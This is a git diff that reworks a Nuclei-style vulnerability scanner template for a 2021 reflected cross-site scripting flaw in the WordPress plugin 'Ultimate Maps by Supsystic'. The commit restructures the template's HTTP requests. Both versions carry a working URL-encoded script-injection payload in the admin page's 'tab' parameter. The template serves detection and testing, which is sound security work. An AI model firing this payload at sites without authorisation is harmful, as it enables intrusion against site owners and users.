fix-trail-error
parent
a876538b83
commit
dd8519a982
|
@ -30,6 +30,8 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss
|
tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -43,10 +45,10 @@ http:
|
||||||
- '/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/'
|
- '/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
http:
|
- raw:
|
||||||
- method: GET
|
- |
|
||||||
path:
|
GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
||||||
- '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -63,4 +65,5 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950
|
||||||
|
|
Loading…
Reference in New Issue